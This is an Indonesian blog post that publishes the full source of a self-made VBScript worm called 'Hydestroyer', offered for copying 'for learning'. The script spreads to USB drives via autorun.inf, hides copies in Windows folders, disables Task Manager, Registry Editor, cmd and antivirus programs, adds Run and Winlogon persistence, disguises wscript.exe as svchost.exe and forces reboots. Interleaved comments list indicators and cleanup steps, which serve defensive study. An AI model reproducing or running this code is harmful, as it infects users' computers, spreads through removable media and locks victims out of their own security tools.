Rabu, 26 Mei 2010

Belajar Membuat Virus VBS dari "Virus Hydestroyer.VBS"

"Tulisan ini hanya bermaksud untuk pembelajaran.
Saya tidak bertanggung jawab atas segala penyalahgunaan dari script ini."


Script "VIRUS HYDESTROYER"
Virus yang saya buat ini (sekitar tahun 2007) bermula dari sebuah file Visual Basic Script yang saya temukan di dalam flashdisk seorang teman.
Setelah saya pelajari, script pendek tersebut bermaksud untuk mengubah tulisan di program Internet Explorer.. Kalo gak salah begini tulisannya >> dajjal...... (saya lupa tulisan selanjutnya).
Lalu dengan bermodal regedit dan pengetahuan di vbs, saya mengubah script tersebut. Selanjutnya dengan sedikit trik dan utak atik, script file tersebut dapat bekerja sama dengan DOS file. Finally, Virus Hydestroyer dapat bekerja di sistem XP Normal maupun Safe Mode.

Inilah Script jadi dari VIRUS HYDESTROYER


'
'& & & & &&& &&&&&& &&&& &&&&&&& &&& &&& & & &&&&&& &&&
'& & & & & & & & & & & & & & & & & &
'& & & & & & & & & & & & & & & & & &
'&&&&&& & & & &&&& &&&& & & & & & & &&&& & &
'& & & & & & & & &&& & & & & &&&
'& & & & & & & & & & & & & & & &
'& & & &&& &&&&&& &&&&& & & & &&& & &&&&&& & &
'----------------------------------------------------------------------------------------
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
' Setup: suppress runtime errors, define the text payloads, and read this script's own source.
' With "on error resume next" a failing statement is skipped silently, so no error
' dialog is shown to the user.
on error resume next
Rem My name is hydestroyer
Dim src, winpath, micpath, runpath, flashdrive, onkan, jalan, ext, txt, jpg, fs, mf, atr, tulis, task, gpedit, tf, rg, nt, batText, check, sd
' atr: content written later to autorun.inf in the root of removable drives. Its
' shellexecute line starts wscript.exe on desktop.ini.vbs.
' Detection: an autorun.inf in a drive root that references a .vbs file.
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe desktop.ini.vbs"&vbcrlf&"____________________"&vbcrlf&"by hydestroyer"
' txt: plain text written later to ketikkan.doc and data.doc.
txt = "Passing by...Passing by... Real World..."&vbcrlf&"running through without your Love"&vbcrlf&"running through without your Love"&vbcrlf&"running with >>> hydestroyer"
' Desk: content written later to desktop.ini on removable drives (folder-view settings).
Desk = "[ExtShellFolderViews]"&vbcrlf&"{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}"&vbcrlf&"[{BE098140-A513-11D0-A3A4-00C04FD706EC}]"&vbcrlf&"Attributes=1"&vbcrlf&"IconArea_Image=.*.jpg"&vbcrlf&"IconArea_Text=0x00FFFFFF"&vbcrlf&"IconArea_TextBackground=0x00FF0665"&vbcrlf&"[.ShellClassInfo]"&vbcrlf&"ConfirmFileOp=0"
' mf is the running script file itself; check holds the type of the drive it was
' started from (compared with 1 at the end of the script); text is a read stream
' (mode 1 = for reading) over the script file.
Set fs = CreateObject("Scripting.FileSystemObject"): Set mf = fs.getfile(Wscript.ScriptFullname): Dim text, size: size = mf.size: check = mf.drive.drivetype: Set text = mf.openastextstream(1, -2)
' Read the script line by line into src; src is what every copy below is written from.
Do While Not text.atendofstream: src=src&text.readline: src = src & vbCrLf: Loop
' Start of the main loop (closed by the "Loop While" statement at the end of the script).
' GetSpecialFolder(0) is the Windows folder, so winpath, micpath, runpath and batpath
' all hold the same path.
'
' File artifacts written here (useful as indicators and as a cleanup list):
'   <Windows>\NTUser.DAT.vbs
'   <Windows>\Microsoft.NET\Tech.DAT.vbs
'   <Windows>\system32\driverconfig.vbs
'   <Windows>\driverconfig.vbs
'   <Windows>\ketikkan.doc            (contains txt, not a Word document)
' Attributes = 32 is Archive only; it is set before the rewrite, presumably so an
' existing copy can be overwritten. Attributes = 39 is ReadOnly + Hidden + System +
' Archive, so the first three copies do not show up in a default Explorer view.
Do: Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\NTUser.DAT.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(winpath & "\NTUser.DAT.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(winpath & "\NTUser.DAT.vbs"): tf.Attributes = 39
Set micpath = fs.getspecialfolder(0): Set tf = fs.getfile(micpath & "\Microsoft.NET\Tech.DAT.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(micpath & "\Microsoft.NET\Tech.DAT.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(micpath & "\Microsoft.NET\Tech.DAT.vbs"): tf.Attributes = 39
Set runpath = fs.getspecialfolder(0): Set tf = fs.getfile(runpath & "\system32\driverconfig.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(runpath & "\system32\driverconfig.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(runpath & "\system32\driverconfig.vbs"): tf.Attributes = 39
' This copy and the text file below keep their default attributes (no 39 is applied).
Set batpath = fs.getspecialfolder(0): Set tf = fs.getfile(batpath & "\driverconfig.vbs"): Set tf = fs.createtextfile(batpath & "\driverconfig.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(batpath & "\driverconfig.vbs")
Set tf = fs.getfile(winpath & "\ketikkan.doc"): Set tf = fs.createtextfile(winpath & "\ketikkan.doc", 2, True): tf.write txt: tf.Close: Set tf = fs.getfile(winpath & "\ketikkan.doc")
' Walk every drive known to the system. DriveType 1 is a removable drive.
' Artifacts written to the root of each removable drive (indicators / cleanup list):
'   desktop.ini.vbs   copy of the script; ReadOnly + Hidden + System + Archive (39)
'   autorun.inf       content of atr;     ReadOnly + Hidden + System + Archive (39)
'   data.doc          content of txt;     default attributes
'   desktop.ini       content of Desk;    ReadOnly + Hidden + System + Archive (39)
' Mitigation on hosts: disable AutoRun for removable media, and review hidden/system
' files in the root of removable drives before opening them.
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1) Then
Set tf = fs.getfile(flashdrive.Path & "\desktop.ini.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\desktop.ini.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\desktop.ini.vbs"): tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\autorun.inf", 2, True): tf.write atr: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & "\data.doc"): Set tf = fs.createtextfile(flashdrive.Path & "\data.doc", 2, True): tf.write txt: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\data.doc")
Set tf = fs.getfile(flashdrive.Path & "\desktop.ini"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\desktop.ini", 2, True): tf.write desk: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\desktop.ini"): tf.Attributes = 39
End If
' The checks below sit inside the For Each loop, so they run once per drive.
' Each of the next three checks starts logoff.exe when one of the copies in the
' Windows folder is not found.
on error resume next
If fs.FileExists(winpath & "\NTUser.DAT.vbs") = false Then
Set onkan = Wscript.CreateObject("Wscript.Shell")
onkan.run(winpath & "\system32\logoff.exe")
End If
on error resume next
If fs.FileExists(runpath & "\system32\driverconfig.vbs") = false Then
Set onkan = Wscript.CreateObject("Wscript.Shell")
onkan.run(winpath & "\system32\logoff.exe")
End If
on error resume next
If fs.FileExists(micpath & "\Microsoft.NET\Tech.DAT.vbs") = false Then
Set onkan = Wscript.CreateObject("Wscript.Shell")
onkan.run(winpath & "\system32\logoff.exe")
End If
' Artifact: <Windows>\ulangi.bat, a batch file whose only command restarts the
' machine after a 31-second timer (shutdown.exe -r -t 31).
on error resume next
If fs.FileExists(winpath & "\ulangi.bat") = false Then
Set tulis = fs.CreateTextFile(winpath & "\ulangi.bat", True)
tulis.WriteLine("@echo off")
tulis.WriteLine("C:\Windows\System32\shutdown.exe -r -t 31")
tulis.Close
Set batText = fs.getfile(winpath & "\ulangi.bat", True)
End If
Next
' Registry changes. Every value below is a candidate for registry-audit detection and
' for the cleanup checklist. Because the policy values disable Registry Editor and
' Task Manager for the current user, cleanup presumably has to be done from another
' account or offline - confirm on the affected system.
Set rg = CreateObject("WScript.Shell")
rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD",0,"REG_DWORD"
' File-type appearance: .vbs files get the display name "hydestroyer" and icon 49 of
' SHELL32.dll; Word and Excel document types get the description "hydestroyer files"
' and icons taken from an Office installer folder. Together with the hidden file
' extensions set below, the icon shown for a file no longer reveals its real type.
rg.regwrite "HKEY_CLASSES_ROOT\VBSFile\FriendlyTypeName", "hydestroyer"
rg.regwrite "HKCR\vbsfile\DefaultIcon\", "%SystemRoot%\system32\SHELL32.dll,49"
rg.regwrite "HKEY_CLASSES_ROOT\Word.Document.8\", "hydestroyer files"
rg.regwrite "HKEY_CLASSES_ROOT\Word.Document.8\DefaultIcon\", "C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\xlicons.exe,1"
rg.regwrite "HKEY_CLASSES_ROOT\Excel.Sheet.8\", "hydestroyer files"
rg.regwrite "HKEY_CLASSES_ROOT\Excel.Sheet.8\DefaultIcon\", "C:\WINDOWS\Installer\{90110409-6000-11D3-8CFE-0150048383C9}\wordicon.exe,1"
' Per-user policy values written by the next two lines (HKCU\...\CurrentVersion):
'   Policies\System:    DisableRegistryTools=1, DisableTaskMgr=1
'   Policies\Explorer:  NoFind, NoRun, NoWinKeys, NoFolderOptions, NoViewOnDrive,
'                       NoShellSearchButton, NoTrayContextMenu = 1
'   Policies\Explorer:  DisallowRun=1 with the list AVG.exe, cmd.exe, kav8.exe,
'                       Notepad.exe, PCMAV-CLN.exe, RamCleaner.exe, RegCleaner.exe
'   Policies\Explorer:  NoDriveTypeAutoRun=145 (0x91); the removable-drive bit (0x4)
'                       is not set, so AutoRun stays enabled for removable drives.
'                       Hardened value: 255 (0xFF) disables AutoRun for all drive types.
'   Explorer\Advanced:  Hidden=2, HideFileExt=1, ShowSuperHidden=0, SuperHidden=1
'                       (hidden and system files not shown, extensions hidden)
'   Policies\ActiveDesktop: NoChangingWallPaper=1
rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1", "AVG.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2", "cmd.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3", "kav8.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4", "Notepad.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5", "PCMAV-CLN.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6", "RamCleaner.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7", "RegCleaner.exe": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",145,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",1,"REG_DWORD": rg.regwrite 
"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoShellSearchButton",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",2,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallPaper",1,"REG_DWORD": rg.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu",1,"REG_DWORD"
' Start-up persistence (machine-wide). Detection: HKLM Run values named
' "C-Media Wave", "MSOffice" and "winamp Wave" whose data is a .vbs path, and a
' Winlogon Shell value other than the plain "Explorer.exe".
' Cleanup: delete the three Run values and restore Shell to "Explorer.exe".
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\C-Media Wave",winpath & "\NTUser.DAT.vbs": rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSOffice",micpath & "\Microsoft.NET\Tech.DAT.vbs": rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winamp Wave",runpath & "\system32\driverconfig.vbs": rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WinLogon\Shell", "Explorer.exe hydeless.bat"
' Internet Explorer: window title text and the default page URL are overwritten.
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "...hydestroyer...": rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Default_Page_URL", ".*."

' Batch-file artifacts and end of the main loop.
' Artifact: <Windows>\converter.bat. The batch file copies wscript.exe from
' system32 into c:\windows under the names hydestroyer.exe and svchost.exe and
' starts driverconfig.vbs with each copy.
' Detection: a svchost.exe located in c:\windows rather than system32, or any
' executable outside system32 whose contents match wscript.exe.
on error resume next
If fs.FileExists(winpath & "\hydestroyer.exe") = false Then
Set tulis = fs.CreateTextFile(winpath & "\converter.bat", True)
tulis.WriteLine("@echo *==================================")
tulis.WriteLine("@echo Welcome to hydestroyer homenet.hack")
tulis.WriteLine("@echo *==================================")
tulis.WriteLine("@echo off")
tulis.WriteLine("copy c:\windows\system32\wscript.exe c:\windows\wscript.exe")
tulis.WriteLine("ren c:\windows\wscript.exe hydestroyer.exe")
tulis.WriteLine("copy c:\windows\system32\wscript.exe c:\windows\wscript.exe")
tulis.WriteLine("ren c:\windows\wscript.exe svchost.exe")
tulis.WriteLine("c:\windows\hydestroyer.exe c:\windows\driverconfig.vbs")
tulis.WriteLine("c:\windows\svchost.exe c:\windows\driverconfig.vbs")
tulis.Close
Set batText = fs.getfile(winpath & "\converter.bat", True)
End If

' converter.bat is started only while <Windows>\hydestroyer.exe does not exist yet.
on error resume next
If fs.FileExists(winpath & "\hydestroyer.exe") = false Then
Set jalan = Wscript.CreateObject("Wscript.Shell")
jalan.run(winpath & "\converter.bat")
End If


' While <Windows>\hydeless.bat does not exist yet, ulangi.bat is started, which
' restarts the machine after its 31-second timer.
on error resume next
If fs.FileExists(winpath & "\hydeless.bat") = false Then
Set onkan = Wscript.CreateObject("Wscript.Shell")
onkan.run(winpath & "\ulangi.bat")
End If

' Artifact: <Windows>\hydeless.bat, the file named in the Winlogon Shell value
' "Explorer.exe hydeless.bat". It starts driverconfig.vbs with both renamed
' wscript.exe copies.
on error resume next
If fs.FileExists(winpath & "\hydeless.bat") = false Then
Set tulis = fs.CreateTextFile(winpath & "\hydeless.bat", True)
tulis.WriteLine("@echo *==================================")
tulis.WriteLine("@echo Welcome to hydestroyer homenet.hack")
tulis.WriteLine("@echo *==================================")
tulis.WriteLine("@echo off")
tulis.WriteLine("c:\windows\hydestroyer.exe c:\windows\driverconfig.vbs")
tulis.WriteLine("c:\windows\svchost.exe c:\windows\driverconfig.vbs")
tulis.Close
Set batText = fs.getfile(winpath & "\hydeless.bat", True)
End If

' check is the drive type of the drive the script was started from. When it is not
' 1 (not a removable drive) the Do loop repeats with no delay (sleep 0), so the
' files and registry values above are rewritten continuously; a wscript.exe process
' with sustained CPU use and repeated writes to the same keys is the behavioural sign.
' When check is 1 the loop body runs once and Explorer is opened with the script
' file selected.
If check <> 1 Then Wscript.sleep 0
Loop While check <> 1: Set sd = CreateObject("Wscript.shell"): sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname



Silakan disalin untuk dipelajari.
Saya akan sangat berterima kasih atas komentar Anda, baik kritikan maupun masukan.

"Tulisan ini hanya bermaksud untuk pembelajaran.
Saya tidak bertanggung jawab atas segala penyalahgunaan dari script ini."
